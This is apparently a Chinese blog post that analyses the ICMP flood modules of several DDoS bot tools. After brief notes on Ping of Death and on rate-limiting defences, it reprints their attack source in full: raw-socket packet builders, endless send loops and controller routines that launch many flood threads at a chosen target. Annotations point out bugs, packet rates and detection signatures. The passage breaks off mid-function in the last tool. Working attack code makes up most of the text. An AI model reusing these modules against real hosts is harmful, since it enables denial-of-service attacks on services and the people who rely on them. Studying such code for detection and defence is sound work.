
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----ICMP篇

2015-09-27 16:56 405 查看
分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn

分析的不好请各位高手见谅花了几个小时分析的呵呵

从下面的代码可以看出,各工具的 ICMP 洪水攻击模块做法基本相同:用原始套接字(SOCK_RAW/IPPROTO_ICMP)自行填写 ICMP Echo 请求首部,然后在循环中高速重复发送同一个数据包(分布式DDOS 是例外,它实际走的是 UDP 套接字,见后文分析)。

ICMP洪水攻击(适用于大带宽服务器:它是纯带宽/CPU 消耗型攻击,效果取决于发送端带宽)

IP 协议规定单个 IP 数据报(包括其中承载的 ICMP 报文)总长度不能超过 65535 字节(约 64KB),这是 IP 首部"总长度"字段的上限,而不是操作系统自己定的规矩。

早期的 TCP/IP 协议栈在重组分片后总长超过 65535 字节的 ICMP 报文时,会在重组缓冲区上发生溢出,导致协议栈崩溃、主机死机,这就是所谓的 Ping of Death。现代操作系统已在发送端限制 ICMP 报文大小、在接收端校验重组长度,这个漏洞早已修复。需要注意,本文分析的各攻击模块单包最大只有 4096 字节(MAX_PACKET),与 Ping of Death 无关,它们靠的是下面说的第二种方式。

此外,向目标主机长时间、连续、大量地发送ICMP数据包,也会最终使系统瘫痪。大量的ICMP数据包会形成“ICMP风暴”,使得目标主机耗费大量的CPU资源处理,疲于奔命。

防范方法

第一种方法是在路由器上对 ICMP 数据包进行带宽限制(通常只需针对 Echo 请求限速,保留其他必要的 ICMP 类型),把 ICMP 占用的带宽控制在一定范围内,这样即使有 ICMP 攻击,它所占用的带宽也非常有限,对整个网络的影响很小;但限速只能保护路由器后面的主机,如果攻击流量已经把上行链路打满,就需要上游运营商协助过滤。

第二种方法是在主机上设置 ICMP 数据包的处理规则。注意:不建议一律拒绝所有 ICMP 数据包——这会破坏路径 MTU 发现(Fragmentation Needed / Packet Too Big)、traceroute 等依赖 ICMP 的机制,IPv6 更是离不开 ICMPv6;更稳妥的做法是只对 ICMP Echo 请求限速或丢弃,并保留其他必要类型。

设置 ICMP 数据包处理规则的方法也有两种,一种是在操作系统上设置包过滤,另一种是在主机上安装防火墙。(原文此处并未给出具体配置步骤;下面直接转入对各 DDoS 工具 ICMP 攻击模块源码的分析。)

//=================================================================================

冷风的.h

/*ICMP Header*/

/*
 * ICMP echo "header" shared (copy-pasted) by nearly every tool on this page.
 * The first 8 bytes (type, code, checksum, id, seq) are the RFC 792 echo
 * header; the trailing ULONG timestamp is really the first 4 bytes of the echo
 * payload, so sizeof(ICMP_HEADER) is 12, not 8.  The layout comes from the
 * classic Windows "ping" sample code.
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; the flood code always sets 8 (echo request)
    BYTE i_code;       // ICMP code; always 0 here
    USHORT i_cksum;    // one's-complement checksum over the whole send buffer
    USHORT i_id;       // echo identifier; this variant stores the bot's process id
    USHORT i_seq;      // echo sequence number, bumped per packet by the flood loop
    ULONG timestamp;   // GetTickCount() at send time -- payload bytes, not header
}ICMP_HEADER;

/****************ICMP FLOOD*******************************/

/*
 * Write an ICMP echo-request header at the start of icmp_data and append the
 * global payload string icmpBuffer right after it.
 *
 * icmp_data: caller-allocated packet buffer (MAX_PACKET bytes in icmp_flood).
 * datasize:  accepted but never read.  The memcpy below is NOT bounded by it:
 *            it writes strlen(icmpBuffer) bytes at offset sizeof(ICMP_HEADER)
 *            and relies on icmpBuffer (declared elsewhere; a 256-byte array in
 *            盘古DDOS优化版.h) being far shorter than the buffer.
 * The checksum is left at 0 -- icmp_flood recomputes it for every packet.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    ICMP_HEADER *icmp_hdr;
    char *datapart;
    icmp_hdr = (ICMP_HEADER*)icmp_data;
    icmp_hdr->i_type = ICMP_ECHO;                      // type 8: echo request ("ping")
    icmp_hdr->i_code = 0;
    icmp_hdr->i_id = (USHORT)GetCurrentProcessId();    // low 16 bits of the bot's PID as echo identifier
    icmp_hdr->i_cksum = 0;
    icmp_hdr->i_seq = 0;
    datapart = icmp_data + sizeof(ICMP_HEADER);        // payload starts after the 12-byte header
    memcpy(datapart,icmpBuffer,strlen(icmpBuffer));    // unbounded copy of the payload string (no NUL copied)
}

/*
 * Thread procedure: ICMP echo-request flood against the host named by the
 * global DdosUrl, looping until the global StopDDosAttack becomes non-zero.
 * dParam is unused.
 *
 * What it does: opens a raw IPPROTO_ICMP socket (raw sockets need
 * administrative privilege on modern Windows) with a 2 s send timeout, builds
 * one MAX_PACKET-byte packet via fill_icmp_data, then resends that packet in a
 * loop, refreshing seq/timestamp/checksum each time.  Sleep(100) between sends
 * makes this the slowest variant on the page (~10 packets/s per thread).
 *
 * Defects: `datasize` is computed but never used (every packet is MAX_PACKET
 * bytes); resolve(), HeapAlloc() and sendto() results are unchecked; the heap
 * buffer and the socket are never released; no WSAStartup() is called in this
 * copy (compare NetBot_Attacker.h below).  Always returns 0 (thread exit code).
 */
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{
    SOCKET m_hSocket;
    SOCKADDR_IN m_addrDest;
    char *icmp_data;
    int datasize = 32;       // intended payload size; dead value, see header comment
    int timeout = 2000;      // SO_SNDTIMEO in milliseconds
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw ICMP socket
    if (m_hSocket == INVALID_SOCKET)
        return 0;
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
        return 0;            // socket leaks on this path
    memset(&m_addrDest, 0, sizeof(m_addrDest));
    m_addrDest.sin_family = AF_INET;
    m_addrDest.sin_addr.S_un.S_addr=resolve(DdosUrl);   // target address; resolve() is defined elsewhere, result unchecked
    datasize += sizeof(ICMP_HEADER);                     // dead store
    icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // never freed; NULL not checked
    memset(icmp_data,0,MAX_PACKET);                      // redundant with HEAP_ZERO_MEMORY
    fill_icmp_data(icmp_data,MAX_PACKET);
    int seq_no=0;
    while(!StopDDosAttack)
    {
        ((ICMP_HEADER*)icmp_data)->i_cksum = 0;          // field must be 0 while the sum is taken
        ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
        ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
        ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);   // checksum() defined elsewhere (see 盘古 sections)
        sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // result ignored
        if (seq_no>=65534)   // wrap before the 16-bit field overflows; restarts at 1, not 0
            seq_no=1;
        Sleep(100);          // ~10 packets per second per thread
    }
    return 0;
}

//=================================================================================

Maxer.h

/*ICMP Header*/

/*
 * Maxer.h copy of the 12-byte ICMP echo "header" (8-byte RFC 792 echo header
 * plus a 4-byte timestamp that is really payload).  Identical layout to the
 * definition in 冷风的.h above.
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; IcmpFlood sets 8 (echo request)
    BYTE i_code;       // ICMP code; 0
    USHORT i_cksum;    // checksum field; IcmpFlood leaves it 0 and never computes it
    USHORT i_id;       // echo identifier; IcmpFlood uses the constant 2
    USHORT i_seq;      // echo sequence; IcmpFlood uses the constant 512
    ULONG timestamp;   // GetTickCount() captured once at thread start
}ICMP_HEADER;

//ICMP攻击

/*
 * Thread procedure: ICMP flood against ddosinfo.addr (a dotted-quad string)
 * until the global IsStop equals 1.
 *
 * Differences from the 冷风/NetBot variant: the packet is a 1024-byte stack
 * buffer rather than a 4096-byte heap buffer; id/seq/timestamp are fixed for
 * the whole run (id 2, seq 512, timestamp from thread start); and i_cksum is
 * set to 0 and NEVER computed -- unless the stack fills it in, receivers will
 * see a bad ICMP checksum (the bandwidth is consumed either way).  The constant
 * id/seq pair is a usable detection signature.
 *
 * Memory-safety defects in the bot's own code:
 *  - memset(Buffer+sizeof(icmp_header),'I',1024) writes 1024 bytes starting 12
 *    bytes into a 1024-byte array: a 12-byte stack buffer overflow;
 *  - icmpsize is 1024+12 = 1036, so every sendto() reads 12 bytes past the end
 *    of Buffer.
 * Also: WSAStartup() result ignored; the setsockopt() failure path returns
 * without closesocket(); m_sockaddr is not zeroed; the socket is never closed
 * and WSACleanup() is never called (the return after the loop is unreachable).
 */
DWORD WINAPI IcmpFlood(LPVOID dParam)
{
    PDDOSINFO pddosinfo = (PDDOSINFO)dParam;      // attack parameters from the creator (type defined elsewhere)
    DDOSINFO ddosinfo;
    memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO)); // private copy so the creator may free/reuse its struct
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);         // result ignored
    SOCKET m_hSocket;
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw ICMP socket: needs admin on modern Windows
    if (m_hSocket == INVALID_SOCKET)
        return 0;
    int timeout = 3000;                           // SO_SNDTIMEO in milliseconds
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
        return 0;                                 // socket leaks on this path
    SOCKADDR_IN m_sockaddr;                       // not zeroed: sin_port/sin_zero are garbage (irrelevant for raw ICMP)
    m_sockaddr.sin_family=AF_INET;
    m_sockaddr.sin_addr.s_addr=inet_addr(ddosinfo.addr);   // no INADDR_NONE check: a non-dotted-quad target becomes 255.255.255.255
    ICMP_HEADER icmp_header;
    icmp_header.i_code=0;
    icmp_header.i_id=2;                           // constant identifier for every packet
    icmp_header.i_cksum=0;                        // never recomputed, see header comment
    icmp_header.i_seq=512;                        // constant sequence number for every packet
    icmp_header.i_type=8;                         // echo request
    icmp_header.timestamp=GetTickCount();         // set once, not per packet
    char Buffer[1024];
    memcpy(Buffer,&icmp_header,sizeof(icmp_header));
    memset(Buffer+sizeof(icmp_header),'I',1024);  // BUG: overruns Buffer by sizeof(icmp_header) bytes
    int icmpsize=sizeof(Buffer)+sizeof(icmp_header);   // 1036 > sizeof(Buffer): sendto reads out of bounds
    while(1)
    {
        if(IsStop==1)                             // controller asked us to stop
        {
            ExitThread(0);
            return 0;
        }
        // Burst of 10 sends with no delay.  The enclosing while(1) repeats
        // forever, so 10 is a burst size, not a cap on the packet count.
        for(int a=0;a<10;a++)
            sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr));   // result ignored
    }
    return 0;                                     // unreachable
}

//=================================================================================

NetBot_Attacker.h

//大家看这个是不是跟 冷风的.h 代码一样呢呵呵 我认为是冷风抄袭NB的呵呵 因为NB这个写得早,冷风给我的时候比较晚

//冷风给我的时候 NB的这个代码还没发布呢 说明NB早就给冷风了

//在这里就不注释了

/*ICMP Header*/

/*
 * NetBot_Attacker.h copy of the 12-byte ICMP echo "header" (8-byte RFC 792
 * echo header plus a 4-byte timestamp that is really payload).  Byte-for-byte
 * the same layout as the definition in 冷风的.h above.
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; set to ICMP_ECHO (8)
    BYTE i_code;       // ICMP code; 0
    USHORT i_cksum;    // checksum over the whole send buffer, recomputed per packet
    USHORT i_id;       // echo identifier; the bot's process id
    USHORT i_seq;      // echo sequence number, incremented per packet
    ULONG timestamp;   // GetTickCount() at send time (payload bytes)
}ICMP_HEADER;

/****************ICMP FLOOD*******************************/

/*
 * Write an ICMP echo-request header at the start of icmp_data and append the
 * global payload string icmpBuffer after it.  Identical to the 冷风的.h
 * version above.
 *
 * icmp_data: caller-allocated packet buffer (MAX_PACKET bytes).
 * datasize:  never read; the memcpy is bounded only by strlen(icmpBuffer),
 *            so correctness relies on icmpBuffer being short (256 bytes
 *            where it is visible on this page).
 * Leaves i_cksum at 0 for the caller to compute.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    ICMP_HEADER *icmp_hdr;
    char *datapart;
    icmp_hdr = (ICMP_HEADER*)icmp_data;
    icmp_hdr->i_type = ICMP_ECHO;                      // echo request
    icmp_hdr->i_code = 0;
    icmp_hdr->i_id = (USHORT)GetCurrentProcessId();    // low 16 bits of the PID
    icmp_hdr->i_cksum = 0;
    icmp_hdr->i_seq = 0;
    datapart = icmp_data + sizeof(ICMP_HEADER);
    memcpy(datapart,icmpBuffer,strlen(icmpBuffer));    // unbounded copy of the payload string
}

/*
 * Thread procedure: ICMP echo-request flood against resolve(fuckweb.FuckIP)
 * until the global stopfuck becomes non-zero.  dParam is unused.
 *
 * This is the 冷风的.h routine with two differences: it calls WSAStartup()
 * first (result unchecked) and sleeps 40 ms instead of 100 ms between packets
 * (~25 packets/s per thread).  Everything else -- raw ICMP socket, 2 s send
 * timeout, one MAX_PACKET buffer rebuilt per packet, seq wrap 65534 -> 1 -- is
 * the same, including the defects: datasize unused, HeapAlloc()/sendto()
 * results ignored, heap buffer and socket never released, no WSACleanup().
 */
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);   // Winsock init, missing in 冷风的.h; result ignored
    SOCKET m_hSocket;
    SOCKADDR_IN m_addrDest;
    char *icmp_data;
    int datasize = 32;       // dead value: packets are always MAX_PACKET bytes
    int timeout = 2000;      // SO_SNDTIMEO in milliseconds
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw socket: needs admin on modern Windows
    if (m_hSocket == INVALID_SOCKET)
        return 0;
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
        return 0;            // socket leaks on this path
    memset(&m_addrDest, 0, sizeof(m_addrDest));
    m_addrDest.sin_family = AF_INET;
    m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);   // target from a global struct; resolve() defined elsewhere
    datasize += sizeof(ICMP_HEADER);   // dead store
    icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // never freed
    memset(icmp_data,0,MAX_PACKET);
    fill_icmp_data(icmp_data,MAX_PACKET);
    int seq_no=0;
    while(!stopfuck)
    {
        ((ICMP_HEADER*)icmp_data)->i_cksum = 0;      // must be 0 while summing
        ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
        ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
        ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
        sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // result ignored
        if (seq_no>=65534)   // keep the sequence inside 16 bits; restarts at 1
            seq_no=1;
        Sleep(40);           // ~25 packets per second per thread
    }
    return 0;
}

//=================================================================================

暴风DDOS.h

#define ICMP_ECHO 8        // ICMP type 8 = echo request (RFC 792)
#define MAX_PACKET 4096    // bytes per flood packet (12-byte header + payload); above a 1500-byte Ethernet MTU, so it is IP-fragmented on the wire

/*
 * 暴风DDOS.h copy of the 12-byte ICMP echo "header": the 8-byte RFC 792 echo
 * header followed by a 4-byte timestamp that is really the start of the
 * payload.  Same layout as the earlier copies on this page.
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; ICMP_ECHO (8)
    BYTE i_code;       // ICMP code; 0
    USHORT i_cksum;    // checksum over the whole MAX_PACKET buffer
    USHORT i_id;       // echo identifier; the bot's process id
    USHORT i_seq;      // echo sequence number, bumped once per burst of 100 packets
    ULONG timestamp;   // GetTickCount() when the burst was built
}ICMP_HEADER;

/*
 * Write an ICMP echo-request header at the start of icmp_data and append the
 * global payload string icmpBuffer after it (same code as the earlier copies).
 *
 * icmp_data: caller-allocated MAX_PACKET-byte buffer.
 * datasize:  never read -- the memcpy is bounded only by strlen(icmpBuffer).
 * Leaves i_cksum at 0 for icmp_flood to compute.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    ICMP_HEADER *icmp_hdr;
    char *datapart;
    icmp_hdr = (ICMP_HEADER*)icmp_data;
    icmp_hdr->i_type = ICMP_ECHO;                      // echo request
    icmp_hdr->i_code = 0;
    icmp_hdr->i_id = (USHORT)GetCurrentProcessId();    // low 16 bits of the PID
    icmp_hdr->i_cksum = 0;
    icmp_hdr->i_seq = 0;
    datapart = icmp_data + sizeof(ICMP_HEADER);
    memcpy(datapart,icmpBuffer,strlen(icmpBuffer));    // unbounded copy of the payload string
}

/*
 * Thread procedure (started through an LPTHREAD_START_ROUTINE cast although it
 * returns void): ICMP echo-request flood against the global tgtIP until the
 * global StopFlag equals 1.
 *
 * Flow: sleep 2 s, WSAStartup, raw ICMP socket with a 2 s send timeout,
 * resolve tgtIP (dotted quad first, gethostbyname() fallback), build one
 * MAX_PACKET (4096-byte) packet, then loop: refresh seq/timestamp/checksum,
 * send the same packet 100 times back to back, Sleep(5).  Each 4096-byte
 * packet exceeds a 1500-byte MTU, so the target sees fragmented ICMP.
 *
 * Defects: datasize and sleep_time are computed and never used; WSAStartup(),
 * HeapAlloc() and sendto() results are ignored; the heap buffer and socket are
 * never released; the return after the loop is unreachable.
 */
void icmp_flood()
{
    Sleep(2000);             // 2 s start-up delay before any traffic
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);   // result ignored
    SOCKET m_hSocket;
    SOCKADDR_IN m_addrDest;
    char *icmp_data;
    int datasize = 32;       // dead value: packets are always MAX_PACKET bytes
    int timeout = 2000;      // SO_SNDTIMEO in milliseconds
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw socket: needs admin on modern Windows
    if (m_hSocket == INVALID_SOCKET)
        return;
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
        return;              // socket leaks on this path
    memset(&m_addrDest, 0, sizeof(m_addrDest));
    m_addrDest.sin_family = AF_INET;
    if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
    {   // not a dotted quad: treat tgtIP as a hostname
        struct hostent *hp = NULL;
        if ((hp = gethostbyname(tgtIP)) != NULL)
        {
            memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);   // first address in the answer
            m_addrDest.sin_family = hp->h_addrtype;
        }
        else
            return;          // unresolvable target: thread exits, socket leaked
    }
    datasize += sizeof(ICMP_HEADER);   // dead store
    icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // never freed; NULL not checked
    memset(icmp_data,0,MAX_PACKET);
    fill_icmp_data(icmp_data,MAX_PACKET);
    int seq_no=0;
    int sleep_time = SleepTime/10;     // derived from a global but never used
    while(1)
    {
        if (StopFlag == 1)             // controller asked us to stop
        {
            ExitThread(0);
            return;
        }
        ((ICMP_HEADER*)icmp_data)->i_cksum = 0;          // must be 0 while summing
        ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;     // never wrapped; silently truncated to 16 bits on store
        ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
        ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
        // 100 identical packets (same seq/timestamp/checksum) back to back, then a 5 ms pause
        for (int i=0;i<100;i++)
            sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // result ignored
        Sleep(5);
    }
    return;                  // unreachable
}

/*
 * Controller entry point: resolve `ip` into the global tgtIP, then start `xc`
 * icmp_flood threads plus one wait_for_end watchdog thread.
 *
 * BUG: the two assignments `port=tgtPort;` and `time=timeout;` are backwards.
 * They overwrite the (unused) parameters from the globals instead of storing
 * the parameters into the globals; the VIP2010 version further down has them
 * the right way round (`tgtPort=port; timeout=time;`).  As written, the port
 * and time arguments have no effect at all.
 *
 * Other notes: if `ip` is not a dotted quad and gethostbyname() fails, tgtIP
 * keeps whatever it held before and the threads are started anyway; strcpy()
 * into tgtIP is unbounded (ip is at most 30 bytes, tgtIP's size is not visible
 * here); StopFlag == -1 doubles as "already running"; the thread-handle global
 * h is overwritten on every iteration so only the last handle survives; i and
 * h are globals not declared in this excerpt.
 */
void StartICMP(char ip[30],int port,int time,int xc)
{
    if (inet_addr(ip)== INADDR_NONE)
    {   // not a dotted quad: resolve as hostname and store the first address as text
        struct hostent *hp = NULL;
        if ((hp = gethostbyname(ip)) != NULL)
        {
            in_addr in;
            memcpy(&in, hp->h_addr, hp->h_length);
            strcpy(tgtIP,inet_ntoa(in));   // unbounded copy into a global of unknown size
        }
        // on resolution failure tgtIP is left stale and we still start threads
    }
    else
        strcpy(tgtIP,ip);
    port=tgtPort;        // BUG: reversed -- should be tgtPort=port
    time=timeout;        // BUG: reversed -- should be timeout=time
    if (StopFlag == -1)  // -1 means an attack is already running
        return;
    StopFlag=-1;
    for(i=0;i<xc;i++)    // i and h are globals; h keeps only the last thread handle
    {
        h=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);   // icmp_flood returns void: signature mismatch papered over by the cast
    }
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);   // watchdog defined elsewhere
}

//==================== ================================

暴风DDOSVIP2010-225源代码.h

/*-----------------------------ICMP data-----------------------------------------------*/

/*
 * 暴风DDOSVIP2010 copy of the 12-byte ICMP echo "header" (8-byte RFC 792 echo
 * header plus a 4-byte timestamp that is really payload).  Same layout as the
 * earlier copies on this page.
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; icmpattack sets 8 (echo request)
    BYTE i_code;       // ICMP code; 0
    USHORT i_cksum;    // checksum field; icmpattack leaves it 0 and never computes it
    USHORT i_id;       // echo identifier; icmpattack uses the constant 2
    USHORT i_seq;      // echo sequence; icmpattack uses the constant 512
    ULONG timestamp;   // GetTickCount() captured once at thread start
}ICMP_HEADER;

/*
 * Thread procedure (started through an LPTHREAD_START_ROUTINE cast although it
 * returns void): ICMP flood against the global tgtIP until the global StopFlag
 * equals 1.  This is the Maxer.h IcmpFlood routine with the target and the
 * send timeout taken from globals (tgtIP, timeout) instead of a DDOSINFO.
 *
 * As in Maxer.h: id 2 / seq 512 / one timestamp for the whole run, i_cksum set
 * to 0 and never computed (receivers will see a bad checksum unless the stack
 * fills it in), and the same two memory-safety bugs -- memset() overruns the
 * 1024-byte Buffer by 12 bytes, and icmpsize (1036) makes every sendto() read
 * 12 bytes past its end.  The socket is never closed; the WSACleanup() after
 * the infinite loop is unreachable.
 */
void icmpattack()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);     // result ignored
    SOCKET m_hSocket;
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw ICMP socket: needs admin on modern Windows
    if (m_hSocket == INVALID_SOCKET)
        return;
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)   // timeout is a global set by StartICMP
        return;                               // socket leaks on this path
    SOCKADDR_IN m_sockaddr;                   // not zeroed: sin_port/sin_zero are garbage (irrelevant for raw ICMP)
    m_sockaddr.sin_family=AF_INET;
    m_sockaddr.sin_addr.s_addr=inet_addr(tgtIP);   // StartICMP already turned hostnames into dotted quads; no INADDR_NONE check here
    ICMP_HEADER icmp_header;
    icmp_header.i_code=0;
    icmp_header.i_id=2;                       // constant identifier for every packet
    icmp_header.i_cksum=0;                    // never recomputed
    icmp_header.i_seq=512;                    // constant sequence number for every packet
    icmp_header.i_type=8;                     // echo request
    icmp_header.timestamp=GetTickCount();     // set once, not per packet
    char Buffer[1024];
    memcpy(Buffer,&icmp_header,sizeof(icmp_header));
    memset(Buffer+sizeof(icmp_header),'I',1024);   // BUG: overruns Buffer by sizeof(icmp_header) bytes
    int icmpsize=sizeof(Buffer)+sizeof(icmp_header);   // 1036 > sizeof(Buffer): out-of-bounds read in sendto
    while(1)
    {
        if(StopFlag==1)                       // controller asked us to stop
        {
            ExitThread(0);
            return;
        }
        // Burst of 10 sends with no delay; the enclosing while(1) repeats forever.
        for(int a=0;a<10;a++)
            sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr));   // result ignored
    }
    WSACleanup();                             // unreachable
    return;
}

/*
 * Controller entry point (VIP2010 build): resolve `ip` into the global tgtIP,
 * store port/time into the globals tgtPort/timeout, start `xc` icmpattack
 * threads (handles kept in the global array h[]) and, only when a duration
 * was given, one wait_for_end watchdog thread.
 *
 * Unlike 暴风DDOS.h above, the global assignments here are the right way
 * round.  Remaining issues: gethostbyname() failure leaves tgtIP stale and the
 * threads are started anyway; strcpy() into tgtIP is unbounded; `timeout` is
 * presumably the same global icmpattack passes to SO_SNDTIMEO, where 0 means
 * no send timeout; tgtPort is never read by the ICMP code; z and h[] are
 * globals not declared in this excerpt (no bound check on z against h[]).
 */
void StartICMP(char ip[30],int port,int time,int xc)
{
    if (inet_addr(ip)== INADDR_NONE)
    {   // not a dotted quad: resolve as hostname and store the first address as text
        struct hostent *hp = NULL;
        if ((hp = gethostbyname(ip)) != NULL)
        {
            in_addr in;
            memcpy(&in, hp->h_addr, hp->h_length);
            strcpy(tgtIP,inet_ntoa(in));   // unbounded copy into a global of unknown size
        }
        // on resolution failure tgtIP is left stale and we still start threads
    }
    else
        strcpy(tgtIP,ip);
    tgtPort=port;            // unused by the ICMP module
    timeout=time;            // attack duration; also feeds SO_SNDTIMEO in icmpattack
    if (StopFlag == -1)      // -1 means an attack is already running
        return;
    StopFlag=-1;
    for(z=0;z<xc;z++)        // z and h[] are globals
    {
        h[z]=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmpattack,NULL,0,NULL);   // icmpattack returns void: signature mismatch papered over by the cast
    }
    if(timeout!=0)           // no watchdog means the flood runs until StopFlag is set elsewhere
    {
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);   // watchdog defined elsewhere
    }
}

//================ ===================================

分布式DDOS.h

/*
 * 24-byte "ICMP header" used by 分布式DDOS: the 8-byte RFC 792 echo header
 * followed by a fixed 16-byte data area.  Field names differ from the
 * ICMP_HEADER typedef used by the other tools, but the first 8 bytes have the
 * same layout.  Note that AttackThread sends this struct as a UDP payload, not
 * as an ICMP message.
 */
struct ICMPHeader //24bytes
{
    unsigned char type;        // 8 = echo request
    unsigned char code;        // 0
    unsigned short checksum;   // RFC 1071 sum computed by InitICMPPacket (over a field it never zeroes)
    unsigned short ProcessID;  // echo identifier; low 16 bits of the bot's process id
    unsigned short Seq;        // echo sequence number; always 0
    char data[16];             // payload: "Attack you!" + NUL, the last 4 bytes left uninitialised
};

//initialize ICMP packet

/*
 * Initialise a 24-byte ICMPHeader as an echo request (type 8, code 0,
 * id = low 16 bits of the process id, seq 0) whose 16-byte data field holds
 * the string "Attack you!" -- a fixed, greppable payload signature.  The
 * RFC 1071 checksum is then computed over the whole struct.
 *
 * Defects: p->checksum is not zeroed before the sum, so the result depends on
 * whatever the field held (AttackThread passes an uninitialised stack struct);
 * data[12..15] after the NUL are likewise left uninitialised and go on the
 * wire.  The odd-length branch adds a whole 16-bit word instead of one byte
 * (reading 1 byte past the buffer) but is dead for this 24-byte struct.  None
 * of this affects delivery: AttackThread ships the struct as a UDP payload,
 * where the ICMP checksum is never inspected.
 */
void InitICMPPacket(ICMPHeader* p)
{
    p->type=8;                                     // echo request
    p->code=0;
    p->ProcessID=(unsigned short)GetCurrentProcessId();   // low 16 bits of the PID
    p->Seq=0;
    char buf[]="Attack you!";                      // 11 chars + NUL = 12 of the 16 data bytes
    strcpy(p->data,buf);                           // fits; data[12..15] untouched
    // NOTE: p->checksum is not cleared here, so the sum below includes its old value.
    unsigned long ulSum=0;
    unsigned short *pBuf=(unsigned short *)p;      // sum the struct as 16-bit words
    int size=sizeof(ICMPHeader);                   // 24
    int index=0;
    for(;size > 1;size -= 2,index++)
        ulSum += pBuf[index];
    if(size != 0) ulSum += pBuf[index];            // odd-length case: adds a full word, not a byte; dead for size 24
    ulSum = (ulSum>>16) + (ulSum&0xffff);          // fold carries into the low 16 bits
    ulSum += (ulSum>>16);
    p->checksum = (unsigned short)(~ulSum);
}

/*
 * Worker thread (UINT(void*) signature, AfxBeginThread style): flood
 * p->att_head.ip while p->isAttacking is true.
 *
 * Despite the name, this is NOT an ICMP flood: the socket is SOCK_DGRAM /
 * IPPROTO_UDP, so each sendto() emits a 24-byte UDP datagram whose payload
 * merely looks like an ICMP echo header.  No raw socket -- and therefore no
 * admin privilege -- is needed, which is presumably why it was written this
 * way.  att_addr is never zeroed, so sin_port (the UDP destination port) is
 * uninitialised stack data.  The loop has no delay (the Sleep is commented
 * out), socket() is unchecked and never closed, the sendto() result is
 * ignored, and isAttacking is a plain member read presumably toggled by the
 * UI thread.  Always returns 0.
 */
UINT CDDOSClientDlg::AttackThread(void* param)
{
    CDDOSClientDlg *p = (CDDOSClientDlg *)param;           // dialog object carrying att_head.ip and isAttacking
    SOCKET att_sock = socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP);   // UDP, not raw ICMP; result unchecked
    SOCKADDR_IN att_addr;                                   // not zeroed: sin_port is stack garbage
    att_addr.sin_family = PF_INET;
    att_addr.sin_addr.s_addr = inet_addr(p->att_head.ip);  // no INADDR_NONE check
